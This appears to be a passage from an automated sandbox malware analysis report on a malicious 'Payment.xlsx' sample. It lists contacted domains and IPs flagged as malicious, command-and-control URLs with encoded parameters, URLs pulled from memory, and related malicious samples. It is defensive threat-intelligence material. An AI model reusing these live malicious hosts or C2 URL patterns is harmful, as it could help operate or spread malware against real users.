          http://www.iask.com/0%URL Reputationsafe
          http://cgi.search.biglobe.ne.jp/0%Avira URL Cloudsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe
          http://search.ipop.co.kr/favicon.ico0%URL Reputationsafe

          Domains and IPs

          Contacted Domains

          NameIPActiveMaliciousAntivirus DetectionReputation
          www.discjockeydelraybeach.com
          		108.177.174.182
          		truetrue
            		unknown
            will.kasraz.com
            		192.3.122.177
            		truetrue
              		unknown
              parkingpage.namecheap.com
              		198.54.117.210
              		truefalse
                		high
                burundiacademyst.com
                		66.235.200.147
                		truetrue
                  		unknown
                  www.arfjkacsgatfzbazpdth.com
                  		103.5.116.132
                  		truetrue
                    		unknown
                    cdl-lb-1356093980.us-east-1.elb.amazonaws.com
                    		54.156.162.121
                    		truefalse
                      		high
                      www.pipienta.com
                      		157.7.107.165
                      		truetrue
                        		unknown
                        www.burundiacademyst.com
                        		unknown
                        		unknowntrue
                          		unknown
                          www.girlboyfriends.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.donelys.com
                            		unknown
                            		unknowntrue
                              		unknown

                              Contacted URLs

                              NameMaliciousAntivirus DetectionReputation
                              http://www.donelys.com/8u3b/?AFNHW=7n5t_JdpSvWLy20&hR-pi0=E22nI3Rip3ZSCOTPZfimDOhq+q3UJ25lzohrmQ28oPNp9Jez+bbbIRv2vJSFHaNW2ScwBg==true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.girlboyfriends.com/8u3b/?hR-pi0=cEpfZmSfutugLfnHiVa5j+DoAWkRsp0AYbKMWCAK4J6qc2NYi7fbBnHBsJTiUxkMWvO3QA==&AFNHW=7n5t_JdpSvWLy20true
                              • Avira URL Cloud: safe
                              		unknown
                              http://www.pipienta.com/8u3b/?hR-pi0=is2RHo+SSSgsSZ79kFP2fipAdyQPfT8mS9EUUiQml/0cQ9Z+p8X+D6w9d6gDGaMqZNMd+w==&AFNHW=7n5t_JdpSvWLy20true
                              • Avira URL Cloud: safe
                              		unknown

                              URLs from Memory and Binaries

                              NameSourceMaliciousAntivirus DetectionReputation
                              http://search.chol.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                		high
                                http://www.mercadolivre.com.br/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.merlin.com.pl/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://search.ebay.de/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                  		high
                                  http://www.mtv.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                    		high
                                    http://www.rambler.ru/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                      		high
                                      http://www.nifty.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                        		high
                                        http://www.dailymail.co.uk/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        http://www3.fnac.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                          		high
                                          http://buscar.ya.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                            		high
                                            http://search.yahoo.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                              		high
                                              http://www.iis.fhg.de/audioPAexplorer.exe, 00000008.00000000.2183655398.0000000004B50000.00000002.00000001.sdmpfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              		unknown
                                              http://www.sogou.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                		high
                                                http://asp.usatoday.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                  		high
                                                  http://fr.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                    		high
                                                    http://rover.ebay.comexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                      		high
                                                      http://in.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                        		high
                                                        http://img.shopzilla.com/shopzilla/shopzilla.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                          		high
                                                          http://search.ebay.in/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            		high
                                                            http://image.excite.co.jp/jp/favicon/lep.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.churchsw.org/church-projector-projectvbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://%s.comexplorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpfalse
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            • URL Reputation: safe
                                                            		low
                                                            http://msk.afisha.ru/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                              		high
                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namevbc.exe, 00000004.00000002.2171469708.0000000002281000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://busca.igbusca.com.br//app/static/images/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                http://search.rediff.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                  		high
                                                                  http://www.windows.com/pctv.explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpfalse
                                                                    		high
                                                                    http://www.ya.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.etmall.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://it.search.dada.net/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      • URL Reputation: safe
                                                                      		unknown
                                                                      http://search.naver.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                        		high
                                                                        http://www.google.ru/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          		high
                                                                          http://search.hanafos.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://cgi.search.biglobe.ne.jp/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          http://www.abril.com.br/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          • URL Reputation: safe
                                                                          		unknown
                                                                          http://search.daum.net/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                            		high
                                                                            http://www.churchsw.org/repository/Bibles/vbc.exe, vbc.exe, 00000005.00000002.2159504550.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000006.00000000.2161211569.0000000000A62000.00000020.00020000.sdmp, vbc.exe, 00000007.00000000.2163492264.0000000000A62000.00000020.00020000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            http://search.naver.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              		high
                                                                              http://search.msn.co.jp/results.aspx?q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              http://www.clarin.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                		high
                                                                                http://buscar.ozu.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                • Avira URL Cloud: safe
                                                                                		unknown
                                                                                http://kr.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                  		high
                                                                                  http://search.about.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://busca.igbusca.com.br/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activityexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                      		high
                                                                                      http://www.ask.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                        		high
                                                                                        http://www.priceminister.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://www.cjmall.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                            		high
                                                                                            http://search.centrum.cz/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                              		high
                                                                                              http://suche.t-online.de/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                		high
                                                                                                http://www.google.it/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  		high
                                                                                                  http://search.auction.co.kr/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  • URL Reputation: safe
                                                                                                  		unknown
                                                                                                  http://www.ceneo.pl/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                    		high
                                                                                                    http://www.amazon.de/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                      		high
                                                                                                      http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervexplorer.exe, 00000008.00000000.2188989063.000000000842E000.00000004.00000001.sdmpfalse
                                                                                                        		high
                                                                                                        http://sads.myspace.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          		high
                                                                                                          http://busca.buscape.com.br/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://www.pchome.com.tw/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://browse.guardian.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://google.pchome.com.tw/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          • URL Reputation: safe
                                                                                                          		unknown
                                                                                                          http://list.taobao.com/browse/search_visual.htm?n=15&amp;q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                            		high
                                                                                                            http://www.rambler.ru/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                              		high
                                                                                                              http://uk.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                		high
                                                                                                                http://espanol.search.yahoo.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  		high
                                                                                                                  http://www.ozu.es/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  http://search.sify.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                    		high
                                                                                                                    http://openimage.interpark.com/interpark.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      		high
                                                                                                                      http://search.yahoo.co.jp/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      		unknown
                                                                                                                      http://search.ebay.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        		high
                                                                                                                        http://www.gmarket.co.kr/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        		unknown
                                                                                                                        http://search.nifty.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          		high
                                                                                                                          http://searchresults.news.com.au/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          • URL Reputation: safe
                                                                                                                          		unknown
                                                                                                                          http://www.google.si/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                            		high
                                                                                                                            http://www.google.cz/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                              		high
                                                                                                                              http://www.soso.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                		high
                                                                                                                                http://www.univision.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                  		high
                                                                                                                                  http://search.ebay.it/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                    		high
                                                                                                                                    http://images.joins.com/ui_c/fvc_joins.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      		high
                                                                                                                                      http://www.asharqalawsat.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      • URL Reputation: safe
                                                                                                                                      		unknown
                                                                                                                                      http://busca.orange.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                        		high
                                                                                                                                        http://cnweb.search.live.com/results.aspx?q=explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                          		high
                                                                                                                                          http://auto.search.msn.com/response.asp?MT=explorer.exe, 00000008.00000000.2193489850.000000000A330000.00000008.00000001.sdmpfalse
                                                                                                                                            		high
                                                                                                                                            http://search.yahoo.co.jpexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            		unknown
                                                                                                                                            http://www.target.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              		high
                                                                                                                                              http://buscador.terra.es/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://search.orange.co.uk/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.iask.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              		unknown
                                                                                                                                              http://www.tesco.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                		high
                                                                                                                                                http://cgi.search.biglobe.ne.jp/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                		unknown
                                                                                                                                                http://search.seznam.cz/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                  		high
                                                                                                                                                  http://suche.freenet.de/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                    		high
                                                                                                                                                    http://search.interpark.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      		high
                                                                                                                                                      http://search.ipop.co.kr/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      • URL Reputation: safe
                                                                                                                                                      		unknown
                                                                                                                                                      http://investor.msn.com/explorer.exe, 00000008.00000000.2182363529.0000000003C40000.00000002.00000001.sdmpfalse
                                                                                                                                                        		high
                                                                                                                                                        http://search.espn.go.com/explorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                          		high
                                                                                                                                                          http://www.myspace.com/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                            		high
                                                                                                                                                            http://search.centrum.cz/favicon.icoexplorer.exe, 00000008.00000000.2193659330.000000000A3E9000.00000008.00000001.sdmpfalse
                                                                                                                                                              		high

                                                                                                                                                              Contacted IPs

                                                                                                                                                              • No. of IPs < 25%
                                                                                                                                                              • 25% < No. of IPs < 50%
                                                                                                                                                              • 50% < No. of IPs < 75%
                                                                                                                                                              • 75% < No. of IPs

                                                                                                                                                              Public

                                                                                                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                              192.3.122.177
                                                                                                                                                              		will.kasraz.comUnited States
                                                                                                                                                              		36352AS-COLOCROSSINGUStrue
                                                                                                                                                              54.156.162.121
                                                                                                                                                              		cdl-lb-1356093980.us-east-1.elb.amazonaws.comUnited States
                                                                                                                                                              		14618AMAZON-AESUSfalse
                                                                                                                                                              103.5.116.132
                                                                                                                                                              		www.arfjkacsgatfzbazpdth.comJapan17408ABOVE-AS-APAboveNetCommunicationsTaiwanTWtrue
                                                                                                                                                              157.7.107.165
                                                                                                                                                              		www.pipienta.comJapan7506INTERQGMOInternetIncJPtrue
                                                                                                                                                              198.54.117.210
                                                                                                                                                              		parkingpage.namecheap.comUnited States
                                                                                                                                                              		22612NAMECHEAP-NETUSfalse
                                                                                                                                                              108.177.174.182
                                                                                                                                                              		www.discjockeydelraybeach.comUnited States
                                                                                                                                                              		395954LEASEWEB-USA-LAX-11UStrue
                                                                                                                                                              66.235.200.147
                                                                                                                                                              		burundiacademyst.comUnited States
                                                                                                                                                              		13335CLOUDFLARENETUStrue

                                                                                                                                                              General Information

                                                                                                                                                              Joe Sandbox Version:32.0.0 Black Diamond
                                                                                                                                                              Analysis ID:404048
                                                                                                                                                              Start date:04.05.2021
                                                                                                                                                              Start time:16:57:27
                                                                                                                                                              Joe Sandbox Product:CloudBasic
                                                                                                                                                              Overall analysis duration:0h 13m 26s
                                                                                                                                                              Hypervisor based Inspection enabled:false
                                                                                                                                                              Report type:light
                                                                                                                                                              Sample file name:Payment.xlsx
                                                                                                                                                              Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                                                                                                                                              Number of analysed new started processes analysed:11
                                                                                                                                                              Number of new started drivers analysed:0
                                                                                                                                                              Number of existing processes analysed:0
                                                                                                                                                              Number of existing drivers analysed:0
                                                                                                                                                              Number of injected processes analysed:1
                                                                                                                                                              Technologies:
                                                                                                                                                              • HCA enabled
                                                                                                                                                              • EGA enabled
                                                                                                                                                              • HDC enabled
                                                                                                                                                              • AMSI enabled
                                                                                                                                                              Analysis Mode:default
                                                                                                                                                              Analysis stop reason:Timeout
                                                                                                                                                              Detection:MAL
                                                                                                                                                              Classification:mal100.troj.expl.evad.winXLSX@14/8@7/7
                                                                                                                                                              EGA Information:Failed
                                                                                                                                                              HDC Information:
                                                                                                                                                              • Successful, ratio: 27.1% (good quality ratio 25.8%)
                                                                                                                                                              • Quality average: 72.6%
                                                                                                                                                              • Quality standard deviation: 28.1%
                                                                                                                                                              HCA Information:
                                                                                                                                                              • Successful, ratio: 97%
                                                                                                                                                              • Number of executed functions: 0
                                                                                                                                                              • Number of non-executed functions: 0
                                                                                                                                                              Cookbook Comments:
                                                                                                                                                              • Adjust boot time
                                                                                                                                                              • Enable AMSI
                                                                                                                                                              • Found application associated with file extension: .xlsx
                                                                                                                                                              • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                              • Attach to Office via COM
                                                                                                                                                              • Scroll down
                                                                                                                                                              • Close Viewer
                                                                                                                                                              Warnings:
                                                                                                                                                              Show All
                                                                                                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                              • TCP Packets have been reduced to 100
                                                                                                                                                              • Report size getting too big, too many NtCreateFile calls found.
                                                                                                                                                              • Report size getting too big, too many NtQueryAttributesFile calls found.

                                                                                                                                                              Simulations

                                                                                                                                                              Behavior and APIs

                                                                                                                                                              TimeTypeDescription
                                                                                                                                                              16:59:09API Interceptor62x Sleep call for process: EQNEDT32.EXE modified
                                                                                                                                                              16:59:11API Interceptor144x Sleep call for process: vbc.exe modified
                                                                                                                                                              16:59:47API Interceptor217x Sleep call for process: NAPSTAT.EXE modified
                                                                                                                                                              17:00:17API Interceptor1x Sleep call for process: explorer.exe modified

                                                                                                                                                              Joe Sandbox View / Context

                                                                                                                                                              IPs

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              192.3.122.17701efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • will.kasraz.com/a/d.dot
                                                                                                                                                              01efad1d_by_Libranalysis.docxGet hashmaliciousBrowse
                                                                                                                                                              • will.kasraz.com/a/d.dot
                                                                                                                                                              103.5.116.13274ed218c_by_Libranalysis.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com/8u3b/?EzrxUr=PWNBDH2hPCb1us8Ao8B+54WayNfcYj50QVchuC7xNQJC497qOyaPHph0Z/JAkFEaPJmxv/9Dmg==&0VMt8D=3fJTbJlpxpVT_2d0
                                                                                                                                                              MRQUolkoK7.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.arfjkacsgatfzbazpdth.com/8u3b/?9rwxC4Lh=PWNBDH2hPCb1us8Ao8B+54WayNfcYj50QVchuC7xNQJC497qOyaPHph0Z/J570kZBf62v/9E1Q==&o2=iN68aFPHs
                                                                                                                                                              198.54.117.210PAYMENT CONFIRMATION.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.clickqrcoaster.com/fcn/?9rmHOtA=4nVmM3kokLOk5A5KPpUlNAhIJJn3COZ2tebCUHwKvxD3r3Ccio9dbVOfTPTbeaZZl4cM&oZ6l=p4spVBAXTFvt5vX0
                                                                                                                                                              Swift Copy#0002.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.poetic.digital/ve9m/?-Z2D=HLd+x3tnWKfUmvtqbbdD8OVjrdMutxNaTSB4wP+X1AEdnyAqpqKn0onUymDEtQ5Ktala&4h5=k2JX5xRHxZU0PLap
                                                                                                                                                              CNTR-NO-GLDU7267089.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.switcheo.finance/uwec/?PbytEF=mHF01N2po0q&MDKDR=3cOH6CfanC83AmjC2DHvKlrvSwO+w2vUbHn8ip8BNDYWXhTumYa46lUfQ1Zud/zuYtNlxg==
                                                                                                                                                              PDF NEW P.OJerhWEMSj4RnE4Z.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.growth.run/edbs/?MnZ=GXLpz&LZ9p=lamNpoAFA21WPgOJ/0ke3JXhlVE4g80b7bt0OZ5VRWf+PcQquiWcaIC6Gn9TZ94KCxj9
                                                                                                                                                              evaoRJkeKU.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.selfimprovementinterface.com/lhc/?r6=H61yjek3NQPZ1i7/SVuwE0aK/qCQUYqKwvJUcnOovW1UxK4XrP3lDzJIJTbIEYNHhneA&YL0=8pN4q
                                                                                                                                                              salescontractv2draft.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.switcheo.finance/uwec/?5jiPPdy=3cOH6CffnF8zA2vO0DHvKlrvSwO+w2vUbH/s+qgAJjYXXQ/ohIL0shsdTTZoFermUb5EoT+GMw==&KneXK=hrtTrR-Hj2Hxpx6p
                                                                                                                                                              rErRI1Ktbf.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.selfimprovementinterface.com/lhc/?t8r=FrglXBN&NBZl=H61yjek3NQPZ1i7/SVuwE0aK/qCQUYqKwvJUcnOovW1UxK4XrP3lDzJIJTbIEYNHhneA
                                                                                                                                                              kAO6QPQsZF.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.ifdca.com/m0rc/?kfLlav=lbR5C4q/Bs6c3SKeepmv0Da9hIgPOrZf3Ut381rRSdXn0224bmGUGa2i5otESCz2qCMY&gL=ybFLLT9hAnjhNt
                                                                                                                                                              yxQWzvifFe.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.manconnectr.services/gts/?uDHXm=9IMft3k8F713VnQnF9zp3jMOr/Batv3t6t3TBX5Dnn3sWNexcE+V9+jLQfTIIs3IwpNq&8p=2dRTAnw8b
                                                                                                                                                              POWPO-201209-248-INV10981-PI100833-Waycos20210225.xlsxGet hashmaliciousBrowse
                                                                                                                                                              • www.adigitaldemocracy.computer/smd0/?CBZpb=n0GxdzhhB&ZvaxiLAp=/m0nPq14FUGSlul8fJdZDW8lKKfn+gzot6xiXfOrt7ZYHXf83Wmhv0cqByGHV5dueqIwmg==
                                                                                                                                                              orDEANQA70mnjpD.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.thenonfictionauthor.com/kzl/?AdhDQXr=Gyn7/ty3DfyImuCS3aJAaEklGXzzwEUNFIImI8Z2ddRHRD+aqWZPG+GUA8BmTtk7xAZy1GghOw==&pP=EFQtiVMhhH5L
                                                                                                                                                              Order83930.exeGet hashmaliciousBrowse
                                                                                                                                                              • www.chelseybalassi.com/pkfa/?kRm0q=540ZEXgghc6Opj/C8VvmRqfXW77/Y/lS6uCB1iFiIAmIxFNNfvvrJybl+KBTtOUqpAtQ&P0D=AdpLplk
                                                                                                                                                              Smart Tankers Qoute no. 2210.xlsxGet hashmaliciousBrowse
